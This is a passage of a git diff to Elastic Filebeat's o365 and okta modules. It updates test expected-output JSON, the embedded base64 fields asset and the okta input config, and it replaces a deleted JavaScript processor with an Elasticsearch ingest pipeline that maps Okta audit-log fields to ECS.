"SIEMTest", "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "input.type": "log", "log.offset": 0, @@ -36,8 +40,8 @@ }, { "@timestamp": "2020-02-17T16:59:47.000Z", - "event.action": "MemberAdded", - "event.category": "web", + "event.action": "added-users-to-group", + "event.category": "iam", "event.code": "MicrosoftTeams", "event.dataset": "o365.audit", "event.id": "3a951c24-3214-5529-b2fe-097628a39ecd", @@ -45,7 +49,10 @@ "event.module": "o365", "event.outcome": "success", "event.provider": "MicrosoftTeams", - "event.type": "info", + "event.type": [ + "group", + "change" + ], "fileset.name": "audit", "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", @@ -87,19 +94,26 @@ "o365.audit.Version": 1, "o365.audit.Workload": "MicrosoftTeams", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.user": "asr", + "related.user": [ + "david@testsiem.onmicrosoft.com", + "chuck@testsiem.onmicrosoft.com", + "bob@testsiem.onmicrosoft.com", + "alice@testsiem.onmicrosoft.com", + "asr" + ], "service.type": "o365", "tags": [ "forwarded" ], "user.domain": "testsiem.onmicrosoft.com", + "user.email": "asr@testsiem.onmicrosoft.com", "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr" }, { "@timestamp": "2020-02-17T16:59:44.000Z", - "event.action": "MemberAdded", - "event.category": "web", + "event.action": "added-users-to-group", + "event.category": "iam", "event.code": "MicrosoftTeams", "event.dataset": "o365.audit", "event.id": "3350cfd2-1020-5b11-99d8-2701f3a29ea3", @@ -107,7 +121,10 @@ "event.module": "o365", "event.outcome": "success", "event.provider": "MicrosoftTeams", - "event.type": "info", + "event.type": [ + "group", + "change" + ], "fileset.name": "audit", "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", @@ -134,12 +151,16 @@ "o365.audit.Version": 1, "o365.audit.Workload": "MicrosoftTeams", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.user": "asr", + "related.user": [ + "asr@testsiem.onmicrosoft.com", + "asr" + ], "service.type": "o365", "tags": [ "forwarded" ], "user.domain": "testsiem.onmicrosoft.com", + "user.email": "asr@testsiem.onmicrosoft.com", "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr" }, @@ -178,6 +199,7 @@ "forwarded" ], "user.domain": "testsiem.onmicrosoft.com", + "user.email": "bob@testsiem.onmicrosoft.com", "user.id": "bob@testsiem.onmicrosoft.com", "user.name": "bob" } diff --git a/x-pack/filebeat/module/o365/audit/test/40-sec-comp-alerts.log-expected.json b/x-pack/filebeat/module/o365/audit/test/40-sec-comp-alerts.log-expected.json index 7401b62112b6..60092cad50ca 100644 --- a/x-pack/filebeat/module/o365/audit/test/40-sec-comp-alerts.log-expected.json +++ b/x-pack/filebeat/module/o365/audit/test/40-sec-comp-alerts.log-expected.json @@ -62,6 +62,7 @@ "forwarded" ], "user.domain": "testsiem.onmicrosoft.com", + "user.email": "asr@testsiem.onmicrosoft.com", "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr" }, diff --git a/x-pack/filebeat/module/o365/fields.go b/x-pack/filebeat/module/o365/fields.go index c371afd8dd9d..e57e3c7b163e 100644 --- a/x-pack/filebeat/module/o365/fields.go +++ b/x-pack/filebeat/module/o365/fields.go @@ -19,5 +19,5 @@ func init() { // AssetO365 returns asset data. // This is the base64 encoded gzipped contents of module/o365. func AssetO365() string { - return "eJzUmcFu40YMhu95ijkX2FyK9uBDAcP2LozGsRE5XfRUTCRaYT2aUTmUE+3TFzPqNrHitNn8vqyPnvATSZH/kM4Hs6d+YsKPP/90YYyyOpqY9W7HJZnhu4piKdwqBz8xv1wYY8wqVJ0jswti7q2vHPvauFBHs5PQPLO+vDBmx+SqOMl2w+eD8bah4ZmXtqtYnx0ao31LE1NL6Nqj7yva2c7pHxk4MTvrIo3+4IWjT5+P2Y2xg2Zlva2pIa9mulma7E0O5fLI/mUQT2FMSw0yetoQgxWx/ejkFOmJtZyPDr6i9tQ/BKn+PX3Fftu39B7CUSyz4JUedVmdDOrtnGU7rSqhGEHObSSBnfndNg3hKEeiC6+sPYyBAVfs96dze1x4rxNOlMu3ONG2UAxt67i0qV3nHFtn+2vbYO585UFufemEpqXygeYslGqnXxzIg8laPJb31te0IrVzq/byh5OscPcnlfrfqJlVqoOMleUbnJk5Jq/g+xsgS78LhQr7GiZtcAIsOLPQpMvgNCGp4ujAB2ni+DJ6hSxCDi7PmVBmbBnplVkXNTS3nv/qCPEmVTJmDXZVlmKQkZobCyQjitBJiSkE5eEltRQgD4tHJV9RtZHQkihTBGHirZuWJdRXn9I4h+k7UqfLJt0NrMW9FcQFX3KVhAZxxQ8ZvQp18FjlZlTRR6Umgi6JHTgQRqkBSm0wBwFgiSk12Cu54ghVR7ZXOoM05/paiLyym7ydASYkIdLYXTAQzMqyuwuPn7ozQNYPnmRlo5JMyzJ0Xs/hWqaeDXS7uQZA1NyRvHsz+MccaMRVqHjHxzcQgMN6ep2fgHTSuiXJMxeAkNp6/gJPf885YFqEa/ZW2dcFyYEAldhYsQ0pVjOb4Ljs56SW3btLd4AgCb6hMkiFSd4Nxc5poVY7YGIqyEdOW2gaB+ekVObiiUtfuq4iIMY8BG0Cez3DMlpQjGBRF3QgYQX22YIVeF/J+lYcAAAn/8H+IzvKs3uEpOYJhgnEwLnJK+sBzA/aCl3bBtEtl3uClHxrpabxCv+9/lY7BHOGH2sHUJrR1nKGPe0FDlPTLVlwqk8EbHIcpvGkm+xrJNUpK9Oa/OkafDMCdeFXAsQ2AbBX+hsJpnGf6Q5JwecgexcsQBj+m3BN+hBk/z+u/B0AAP//cb9ybQ==" + return "eJzUmUFv40YMhe/7K+ZcYHMp2oMPBVw7WRiNEyNyuuipGEu0wno0VDmUE++vL0bawoljd7N5vjRHK/z0huK8IaWPbkO7kZMff/7pg3PGFmjkbtdrLskNv1WUSuXWWOLI/fLBOefmUnWB3FrUPfhYBY61C1Int1ZpnkVffHBuzRSqNOrjhr+PLvqGhnte+K5ie3bROdu1NHK1Ste++L2ite+C/dkDR27tQ6KDf3gldP931cs4FOjmPvqaGormxouZ69X0S7l4Ef96EftljMfTT1nsrDq45bCQDe0eRffXjjNKEz0a7lX97uDKMTV71mx6cOFNSvbxy11L7yG8WMtEotGTwTmZteOqUkoJ5NwnUljMH75pCEcFUruMxraDMTDgmuPmeG5fFt5pwpFy+R4RLbZv2jZw6fOWn3Jqg9/d+AaT8y8PkvWlUxqXxluaslKund3lliKYrMun8sHHmuZkfurNX/xwlCWrv6i0/0ZNvFEteugs3yFmEpiigc9vgMziWgpTjjVMWuAE2HAm0uQD5Tghu+LBhSjapMMD7SS5i18LFKuliahSgCt9ojSIYWTbTbpk0txH/rsjRE3eFFg0ltSp3IhNOZnyqjPqt/xR2kokkI/f2O79GQFahqroTdes6Hh78TZIXgeW2x5RSKcl5n/Ut3fZMADzu3wyihVVC5WW1JgSCNPow7gsIde4UmnGbfv+cumbUOz4Q/berMlHJ1vx4BWREEuusg8jUuLwSK6lRm2yRxW7ZNQkUJL6gQNh0lTKa169v0pmRg1Q7UM4CJhId8IXgzzrAU7Gg0Vu1GBFcc3JfvWJltS0wRudiQZTJhJOTJFvRsxKiSABKO8cv2QLYB7yE8abid49+vMTZIAPNiPyzFkwsJi557CSp0/dGSC3j5F07pORjssy7+VzSOupZwPdL24AEOV+6d1j8ddwwCTnUvGaXzYoAA7zy9v+DshOum1J+ykBQGjtI3+B55XnHDAtyjVHbxzrgnSL9NcLr74hw2pmIYHL3ZTMc3h36Q4QJMF3VIpWmOXdUeqCFeatAxrqgmJi4y3laWFKRmVfPGkWy9BVBKyxb3EXwtHO8CamoJTAoi5oS8oGvMwp2IDnlaPvNQAAcDAc4q84UD/aJchq9jDMIAbOXf+SZQvmB90KXduK2pLLDUFOvvRa0/HW/f/3oWJYzBm+VAyg3KPd6hmm8Fc4zE2X5MGJKROwzvH5pIRkeujqs/9yrCFQIh3Xp17PvRmBSviNANPOAKw0fifFvPIzrZAUfBbdBPEAYfgkd0P2KLr5hpR/AgAA//9RmUaQ" } diff --git a/x-pack/filebeat/module/okta/system/config/input.yml b/x-pack/filebeat/module/okta/system/config/input.yml index be1634d73ae9..05ff819fad0a 100644 --- a/x-pack/filebeat/module/okta/system/config/input.yml +++ b/x-pack/filebeat/module/okta/system/config/input.yml @@ -50,13 +50,17 @@ tags: {{.tags | tojson}} publisher_pipeline.disable_host: {{ inList .tags "forwarded" }} processors: - - script: - lang: javascript - id: okta_system_script - file: ${path.home}/module/okta/system/config/pipeline.js - params: - keep_original_message: {{ .keep_original_message }} + - decode_json_fields: + fields: + - message + target: json +{{ if eq .keep_original_message true }} + - rename: + fields: + - from: message + to: event.original +{{ end }} - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/okta/system/config/pipeline.js b/x-pack/filebeat/module/okta/system/config/pipeline.js deleted file mode 100644 index 0d381b0944d6..000000000000 --- a/x-pack/filebeat/module/okta/system/config/pipeline.js +++ /dev/null @@ -1,215 +0,0 @@ -// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one -// or more contributor license agreements. Licensed under the Elastic License; -// you may not use this file except in compliance with the Elastic License. - -function OktaSystem(keep_original_message) { - var processor = require("processor"); - - var decodeJson = new processor.DecodeJSONFields({ - fields: ["message"], - target: "json", - }); - - var setId = function(evt) { - var oktaUuid = evt.Get("json.uuid"); - if (oktaUuid) { - evt.Put("@metadata._id", oktaUuid); - } - }; - - var parseTimestamp = new processor.Timestamp({ - field: "json.published", - timezone: "UTC", - layouts: ["2006-01-02T15:04:05.999Z"], - tests: ["2020-02-05T18:19:23.599Z"], - ignore_missing: true, - }); - - var saveOriginalMessage = function(evt) {}; - if (keep_original_message) { - saveOriginalMessage = new processor.Convert({ - fields: [ - {from: "message", to: "event.original"} - ], - mode: "rename" - }); - } - - var dropOriginalMessage = function(evt) { - evt.Delete("message"); - }; - - var categorizeEvent = new processor.AddFields({ - target: "event", - fields: { - category: ["authentication"], - kind: "event", - type: ["access"], - - }, - }); - - var convertFields = new processor.Convert({ - fields: [ - { from: "json.displayMessage", to: "okta.display_message" }, - { from: "json.eventType", to: "okta.event_type" }, - { from: "json.uuid", to: "okta.uuid" }, - { from: "json.actor.alternateId", to: "okta.actor.alternate_id" }, - { from: "json.actor.displayName", to: "okta.actor.display_name" }, - { from: "json.actor.id", to: "okta.actor.id" }, - { from: "json.actor.type", to: "okta.actor.type" }, - { from: "json.client.device", to: "okta.client.device" }, - { from: "json.client.geographicalContext.geolocation", to: "client.geo.location" }, - { from: "json.client.geographicalContext.city", to: "client.geo.city_name" }, - { from: "json.client.geographicalContext.state", to: "client.geo.region_name" }, - { from: "json.client.geographicalContext.country", to: "client.geo.country_name" }, - { from: "json.client.id", to: "okta.client.id" }, - { from: "json.client.ipAddress", to: "okta.client.ip" }, - { from: "json.client.userAgent.browser", to: "okta.client.user_agent.browser" }, - { from: "json.client.userAgent.os", to: "okta.client.user_agent.os" }, - { from: "json.client.userAgent.rawUserAgent", to: "okta.client.user_agent.raw_user_agent" }, - { from: "json.client.zone", to: "okta.client.zone" }, - { from: "json.outcome.reason", to: "okta.outcome.reason" }, - { from: "json.outcome.result", to: "okta.outcome.result" }, - { from: "json.target", to: "okta.target" }, - { from: "json.transaction.id", to: "okta.transaction.id" }, - { from: "json.transaction.type", to: "okta.transaction.type" }, - { from: "json.debugContext.debugData.deviceFingerprint", to: "okta.debug_context.debug_data.device_fingerprint" }, - { from: "json.debugContext.debugData.requestId", to: "okta.debug_context.debug_data.request_id" }, - { from: "json.debugContext.debugData.requestUri", to: "okta.debug_context.debug_data.request_uri" }, - { from: "json.debugContext.debugData.threatSuspected", to: "okta.debug_context.debug_data.threat_suspected" }, - { from: "json.debugContext.debugData.url", to: "okta.debug_context.debug_data.url" }, - { from: "json.authenticationContext.authenticationProvider", to: "okta.authentication_context.authentication_provider" }, - { from: "json.authenticationContext.authenticationStep", to: "okta.authentication_context.authentication_step" }, - { from: "json.authenticationContext.credentialProvider", to: "okta.authentication_context.credential_provider" }, - { from: "json.authenticationContext.credentialType", to: "okta.authentication_context.credential_type" }, - { from: "json.authenticationContext.externalSessionId", to: "okta.authentication_context.external_session_id" }, - { from: "json.authenticationContext.interface", to: "okta.authentication_context.authentication_provider" }, - { from: "json.authenticationContext.issuer", to: "okta.authentication_context.issuer" }, - { from: "json.securityContext.asNumber", to: "okta.security_context.as.number" }, - { from: "json.securityContext.asOrg", to: "okta.security_context.as.organization.name" }, - { from: "json.securityContext.domain", to: "okta.security_context.domain" }, - { from: "json.securityContext.isProxy", to: "okta.security_context.is_proxy" }, - { from: "json.securityContext.isp", to: "okta.security_context.isp" }, - ], - mode: "rename", - ignore_missing: true, - fail_on_error: false, - }); - - var copyFields = new processor.Convert({ - fields: [ - { from: "okta.client.user_agent.raw_user_agent", to: "user_agent.original" }, - { from: "okta.client.ip", to: "client.ip" }, - { from: "okta.client.ip", to: "source.ip" }, - { from: "okta.event_type", to: "event.action" }, - { from: "okta.security_context.as.number", to: "client.as.number" }, - { from: "okta.security_context.as.organization.name", to: "client.as.organization.name" }, - { from: "okta.security_context.domain", to: "client.domain" }, - { from: "okta.security_context.domain", to: "source.domain" }, - { from: "okta.uuid", to: "event.id" }, - ], - ignore_missing: true, - fail_on_error: false, - }); - - var setEventOutcome = function(evt) { - var outcome = evt.Get("okta.outcome.result"); - if (outcome) { - outcome = outcome.toLowerCase(); - if (outcome === "success" || outcome === "allow") { - evt.Put("event.outcome", "success"); - } else if (outcome === "failure" || outcome === "deny") { - evt.Put("event.outcome", "failure"); - } else { - evt.Put("event.outcome", "unknown"); - } - } - }; - - // Update nested fields - var renameNestedFields = function(evt) { - var arr = evt.Get("okta.target"); - if (arr) { - for (var i = 0; i < arr.length; i++) { - arr[i].alternate_id = arr[i].alternateId; - arr[i].display_name = arr[i].displayName; - delete arr[i].alternateId; - delete arr[i].displayName; - delete arr[i].detailEntry; - } - } - }; - - // Set user info if actor type is User - var setUserInfo = function(evt) { - if (evt.Get("okta.actor.type") === "User") { - evt.Put("client.user.full_name", evt.Get("okta.actor.display_name")); - evt.Put("source.user.full_name", evt.Get("okta.actor.display_name")); - evt.Put("related.user", evt.Get("okta.actor.display_name")); - evt.Put("client.user.id", evt.Get("okta.actor.id")); - evt.Put("source.user.id", evt.Get("okta.actor.id")); - } - }; - - // Set related.ip field - var setRelatedIP = function(event) { - var ip = event.Get("source.ip"); - if (ip) { - event.AppendTo("related.ip", ip); - } - ip = event.Get("destination.ip"); - if (ip) { - event.AppendTo("related.ip", ip); - } - }; - - // Drop extra fields - var dropExtraFields = function(evt) { - evt.Delete("json"); - }; - - // Remove null fields - var dropNullFields = function(evt) { - function dropNull(obj) { - Object.keys(obj).forEach(function(key) { - (obj[key] && typeof obj[key] === 'object') && dropNull(obj[key]) || - (obj[key] === null) && delete obj[key]; - }); - return obj; - } - dropNull(evt); - }; - - var pipeline = new processor.Chain() - .Add(decodeJson) - .Add(setId) - .Add(parseTimestamp) - .Add(saveOriginalMessage) - .Add(dropOriginalMessage) - .Add(categorizeEvent) - .Add(convertFields) - .Add(copyFields) - .Add(setEventOutcome) - .Add(renameNestedFields) - .Add(setUserInfo) - .Add(setRelatedIP) - .Add(dropExtraFields) - .Add(dropNullFields) - .Build(); - - return { - process: pipeline.Run, - }; -} - -var oktaSystem; - -// Register params from configuration. -function register(params) { - oktaSystem = new OktaSystem(params.keep_original_message); -} - -function process(evt) { - return oktaSystem.process(evt); -} diff --git a/x-pack/filebeat/module/okta/system/ingest/pipeline.yml b/x-pack/filebeat/module/okta/system/ingest/pipeline.yml index 0da85185ca24..dc576e9c70c7 100644 --- a/x-pack/filebeat/module/okta/system/ingest/pipeline.yml +++ b/x-pack/filebeat/module/okta/system/ingest/pipeline.yml @@ -4,6 +4,503 @@ processors: - set: field: event.ingested value: "{{_ingest.timestamp}}" + - script: + description: Drops null/empty values recursively + lang: painless + source: | + boolean drop(Object o) { + if (o == null || o == "") { + return true; + } else if (o instanceof Map) { + ((Map) o).values().removeIf(v -> drop(v)); + return (((Map) o).size() == 0); + } else if (o instanceof List) { + ((List) o).removeIf(v -> drop(v)); + return (((List) o).length == 0); + } + return false; + } + drop(ctx); + - remove: + field: message + ignore_missing: true + - convert: + field: json.uuid + target_field: _id + type: string + ignore_failure: true + if: ctx?.json?.uuid != null && ctx?.json?.uuid != "" + - date: + field: json.published + formats: + - ISO8601 + ignore_failure: true + - set: + field: event.kind + value: event + - rename: + field: json.displayMessage + target_field: okta.display_message + ignore_missing: true + ignore_failure: true + - rename: + field: json.eventType + target_field: okta.event_type + ignore_missing: true + ignore_failure: true + - append: + field: event.category + value: iam + if: | + ["group.user_membership.add","group.user_membership.remove", + "user.lifecycle.activate","user.lifecycle.create", + "user.lifecycle.deactivate","user.lifecycle.suspend", + "user.lifecycle.unsuspend"].contains(ctx?.okta?.event_type) + - append: + field: event.category + value: configuration + if: | + ["policy.lifecycle.activate","policy.lifecycle.create", + "policy.lifecycle.deactivate","policy.lifecycle.delete", + "policy.lifecycle.update","policy.rule.activate","policy.rule.add", + "policy.rule.deactivate","policy.rule.delete", + "application.lifecycle.create","application.lifecycle.delete", + "policy.rule.update","application.lifecycle.activate", + "application.lifecycle.deactivate","application.lifecycle.update"].contains(ctx?.okta?.event_type) + - append: + field: event.category + value: authentication + if: '["user.session.start","user.session.end","user.authentication.sso","policy.evaluate_sign_on"].contains(ctx?.okta?.event_type)' + - append: + field: event.category + value: session + if: '["user.session.start","user.session.end"].contains(ctx?.okta?.event_type)' + - append: + field: event.type + value: info + if: | + ["system.org.rate_limit.warning","system.org.rate_limit.violation", + "core.concurrency.org.limit.violation"].contains(ctx?.okta?.event_type) + - append: + field: event.type + value: network + if: '["security.request.blocked"].contains(ctx?.okta?.event_type)' + - append: + field: event.type + value: network + if: | + ["system.org.rate_limit.warning","system.org.rate_limit.violation", + "core.concurrency.org.limit.violation","security.request.blocked"].contains(ctx?.okta?.event_type) + - append: + field: event.type + value: start + if: '["user.session.start"].contains(ctx?.okta?.event_type)' + - append: + field: event.type + value: end + if: '["user.session.end"].contains(ctx?.okta?.event_type)' + - append: + field: event.type + value: group + if: '["group.user_membership.add","group.user_membership.remove"].contains(ctx?.okta?.event_type)' + - append: + field: event.type + value: user + if: | + ["user.lifecycle.activate","user.lifecycle.create", + "user.lifecycle.deactivate","user.lifecycle.suspend", + "user.lifecycle.unsuspend","user.authentication.sso", + "user.session.start","user.session.end","application.user_membership.add", + "application.user_membership.remove","application.user_membership.change_username"].contains(ctx?.okta?.event_type) + - append: + field: event.type + value: change + if: | + ["user.lifecycle.activate","user.lifecycle.deactivate", + "user.lifecycle.suspend","user.lifecycle.unsuspend", + "group.user_membership.add","group.user_membership.remove", + "policy.lifecycle.activate","policy.lifecycle.deactivate", + "policy.lifecycle.update","policy.rule.activate","policy.rule.add", + "policy.rule.deactivate","policy.rule.update","application.user_membership.add", + "application.user_membership.remove","application.user_membership.change_username"].contains(ctx?.okta?.event_type) + - append: + field: event.type + value: creation + if: '["user.lifecycle.create","policy.lifecycle.create","application.lifecycle.create"].contains(ctx?.okta?.event_type)' + - append: + field: event.type + value: deletion + if: '["policy.lifecycle.delete","application.lifecycle.delete"].contains(ctx?.okta?.event_type)' + - append: + field: event.type + value: info + if: '["policy.evaluate_sign_on"].contains(ctx?.okta?.event_type)' + - rename: + field: json.uuid + target_field: okta.uuid + ignore_missing: true + ignore_failure: true + - rename: + field: json.actor.alternateId + target_field: okta.actor.alternate_id + ignore_missing: true + ignore_failure: true + - rename: + field: json.actor.displayName + target_field: okta.actor.display_name + ignore_missing: true + ignore_failure: true + - rename: + field: json.actor.id + target_field: okta.actor.id + ignore_missing: true + ignore_failure: true + - rename: + field: json.actor.type + target_field: okta.actor.type + ignore_missing: true + ignore_failure: true + - rename: + field: json.client.device + target_field: okta.client.device + ignore_missing: true + ignore_failure: true + - rename: + field: json.client.geographicalContext.geolocation + target_field: client.geo.location + ignore_missing: true + ignore_failure: true + - rename: + field: json.client.geographicalContext.city + target_field: client.geo.city_name + ignore_missing: true + ignore_failure: true + - rename: + field: json.client.geographicalContext.state + target_field: client.geo.region_name + ignore_missing: true + ignore_failure: true + - rename: + field: json.client.geographicalContext.country + target_field: client.geo.country_name + ignore_missing: true + ignore_failure: true + - rename: + field: json.client.id + target_field: okta.client.id + ignore_missing: true + ignore_failure: true + - rename: + field: json.client.ipAddress + target_field: okta.client.ip + ignore_missing: true + ignore_failure: true + - rename: + field: json.client.userAgent.browser + target_field: okta.client.user_agent.browser + ignore_missing: true + ignore_failure: true + - rename: + field: json.client.userAgent.os + target_field: okta.client.user_agent.os + ignore_missing: true + ignore_failure: true + - rename: + field: json.client.userAgent.rawUserAgent + target_field: okta.client.user_agent.raw_user_agent + ignore_missing: true + ignore_failure: true + - rename: + field: json.client.zone + target_field: okta.client.zone + ignore_missing: true + ignore_failure: true + - rename: + field: json.outcome.reason + target_field: okta.outcome.reason + ignore_missing: true + ignore_failure: true + - rename: + field: json.outcome.result + target_field: okta.outcome.result + ignore_missing: true + ignore_failure: true + - rename: + field: json.target + target_field: okta.target + ignore_missing: true + ignore_failure: true + - rename: + field: json.transaction.id + target_field: okta.transaction.id + ignore_missing: true + ignore_failure: true + - rename: + field: json.transaction.type + target_field: okta.transaction.type + ignore_missing: true + ignore_failure: true + - rename: + field: json.debugContext.debugData.deviceFingerprint + target_field: okta.debug_context.debug_data.device_fingerprint + ignore_missing: true + ignore_failure: true + - rename: + field: json.debugContext.debugData.requestId + target_field: okta.debug_context.debug_data.request_id + ignore_missing: true + ignore_failure: true + - rename: + field: json.debugContext.debugData.requestUri + target_field: okta.debug_context.debug_data.request_uri + ignore_missing: true + ignore_failure: true + - rename: + field: json.debugContext.debugData.threatSuspected + target_field: okta.debug_context.debug_data.threat_suspected + ignore_missing: true + ignore_failure: true + - rename: + field: json.debugContext.debugData.url + target_field: okta.debug_context.debug_data.url + ignore_missing: true + ignore_failure: true + - rename: + field: json.authenticationContext.authenticationProvider + target_field: okta.authentication_context.authentication_provider + ignore_missing: true + ignore_failure: true + - rename: + field: json.authenticationContext.authenticationStep + target_field: okta.authentication_context.authentication_step + ignore_missing: true + ignore_failure: true + - rename: + field: json.authenticationContext.credentialProvider + target_field: okta.authentication_context.credential_provider + ignore_missing: true + ignore_failure: true + - rename: + field: json.authenticationContext.credentialType + target_field: okta.authentication_context.credential_type + ignore_missing: true + ignore_failure: true + - rename: + field: json.authenticationContext.externalSessionId + target_field: okta.authentication_context.external_session_id + ignore_missing: true + ignore_failure: true + - rename: + field: json.authenticationContext.interface + target_field: okta.authentication_context.authentication_provider + ignore_missing: true + ignore_failure: true + - rename: + field: json.authenticationContext.issuer + target_field: okta.authentication_context.issuer + ignore_missing: true + ignore_failure: true + - rename: + field: json.securityContext.asNumber + target_field: okta.security_context.as.number + ignore_missing: true + ignore_failure: true + - rename: + field: json.securityContext.asOrg + target_field: okta.security_context.as.organization.name + ignore_missing: true + ignore_failure: true + - rename: + field: json.securityContext.domain + target_field: okta.security_context.domain + ignore_missing: true + ignore_failure: true + - rename: + field: json.securityContext.isProxy + target_field: okta.security_context.is_proxy + ignore_missing: true + ignore_failure: true + - rename: + field: json.securityContext.isp + target_field: okta.security_context.isp + ignore_missing: true + ignore_failure: true + - convert: + field: okta.client.user_agent.raw_user_agent + target_field: user_agent.original + type: string + ignore_failure: true + - convert: + field: okta.client.ip + target_field: client.ip + type: string + ignore_failure: true + - convert: + field: okta.client.ip + target_field: source.ip + type: string + ignore_failure: true + - convert: + field: okta.event_type + target_field: event.action + type: string + ignore_failure: true + - convert: + field: okta.security_context.as.number + target_field: client.as.number + type: string + ignore_failure: true + - convert: + field: okta.security_context.as.organization.name + target_field: client.as.organization.name + type: string + ignore_failure: true + - convert: + field: okta.security_context.domain + target_field: client.domain + type: string + ignore_failure: true + - convert: + field: okta.security_context.domain + target_field: source.domain + type: string + ignore_failure: true + - convert: + field: okta.uuid + target_field: event.id + type: string + ignore_failure: true + - lowercase: + field: okta.outcome.result + target_field: okta.outcome.result_lower + ignore_missing: true + - set: + field: event.outcome + value: success + if: ctx?.okta?.outcome?.result_lower != null && (ctx?.okta?.outcome?.result_lower == "success" || ctx?.okta?.outcome?.result_lower == "allow") + - set: + field: event.outcome + value: failure + if: ctx?.okta?.outcome?.result_lower != null && (ctx?.okta?.outcome?.result_lower == "failure" || ctx?.okta?.outcome?.result_lower == "deny") + - set: + field: event.outcome + value: unknown + if: ctx?.event?.outcome == null + - remove: + field: okta.outcome.result_lower + ignore_missing: true + - script: + lang: painless + source: | + def arr = ctx?.okta?.target; + if (arr != null) { + for (def i = 0; i < arr.length; i++) { + arr[i]["alternate_id"] = arr[i]["alternateId"]; + arr[i].remove("alternateId"); + arr[i]["display_name"] = arr[i]["displayName"]; + arr[i].remove("displayName"); + arr[i].remove("detailEntry"); + } + } + - script: + lang: painless + source: | + def arr = ctx?.okta?.target; + if (arr != null) { + for (def i = 0; i < arr.length; i++) { + if (arr[i]["type"].toLowerCase().contains("user")) { + ctx["okta_target_user"] = arr[i]; + break; + } + } + } + if: ctx?.okta?.event_type != null && ctx?.okta?.event_type.contains("user.") + - script: + lang: painless + source: | + def arr = ctx?.okta?.target; + if (arr != null) { + for (def i = 0; i < arr.length; i++) { + if (arr[i]["type"].toLowerCase().contains("group")) { + ctx["okta_target_group"] = arr[i]; + break; + } + } + } + if: ctx?.okta?.event_type != null && ctx?.okta?.event_type.contains("group.") + - rename: + field: okta_target_user.display_name + target_field: user.target.full_name + ignore_missing: true + - rename: + field: okta_target_user.id + target_field: user.target.id + ignore_missing: true + - rename: + field: okta_target_user.login + target_field: user.target.email + ignore_missing: true + - rename: + field: okta_target_group.display_name + target_field: user.target.group.name + ignore_missing: true + - rename: + field: okta_target_group.id + target_field: user.target.group.id + ignore_missing: true + - remove: + field: + - okta_target_user + - okta_target_group + ignore_missing: true + - set: + field: client.user.id + value: "{{okta.actor.id}}" + ignore_empty_value: true + if: ctx?.okta?.actor?.id != null + - set: + field: source.user.id + value: "{{okta.actor.id}}" + ignore_empty_value: true + if: ctx?.okta?.actor?.id != null + - set: + field: client.user.full_name + value: "{{okta.actor.display_name}}" + ignore_empty_value: true + if: ctx?.okta?.actor?.display_name != null + - set: + field: source.user.full_name + value: "{{okta.actor.display_name}}" + ignore_empty_value: true + if: ctx?.okta?.actor?.display_name != null + - set: + field: user.full_name + value: "{{okta.actor.display_name}}" + ignore_empty_value: true + if: ctx?.okta?.actor?.display_name != null + - append: + field: related.user + value: "{{okta.actor.display_name}}" + allow_duplicates: false + if: ctx?.okta?.actor?.display_name != null + - append: + field: related.user + value: "{{user.target.full_name}}" + allow_duplicates: false + if: ctx?.user?.target?.full_name != null + - append: + field: related.ip + value: "{{source.ip}}" + allow_duplicates: false + if: ctx?.source?.ip != null + - append: + field: related.ip + value: "{{destination.ip}}" + allow_duplicates: false + if: ctx?.destination?.ip != null + - remove: + field: json + ignore_missing: true - user_agent: field: user_agent.original ignore_missing: true diff --git a/x-pack/filebeat/module/okta/system/test/okta-system-test.json.log-expected.json b/x-pack/filebeat/module/okta/system/test/okta-system-test.json.log-expected.json index 39d002441853..226b52efa7d6 100644 --- a/x-pack/filebeat/module/okta/system/test/okta-system-test.json.log-expected.json +++ b/x-pack/filebeat/module/okta/system/test/okta-system-test.json.log-expected.json @@ -11,7 +11,8 @@ "client.user.id": "00u1abvz4pYqdM8ms4x6", "event.action": "user.session.end", "event.category": [ - "authentication" + "authentication", + "session" ], "event.dataset": "okta.system", "event.id": "faf7398a-4f77-11ea-97fb-5925e98228bd", @@ -20,7 +21,8 @@ "event.original": "{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102nZHzd6OHSfGG51vsoc22gw\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"108.255.197.247\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"authnRequestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestId\":\"XkccyyMli2Uay2I93ZgRzQAAB0c\",\"requestUri\":\"/login/signout\",\"threatSuspected\":\"false\",\"url\":\"/login/signout?message=login_page_messages.session_has_expired\"}},\"displayMessage\":\"User logout from Okta\",\"eventType\":\"user.session.end\",\"legacyEventType\":\"core.user_auth.logout_success\",\"outcome\":{\"reason\":null,\"result\":\"SUCCESS\"},\"published\":\"2020-02-14T22:18:51.843Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United 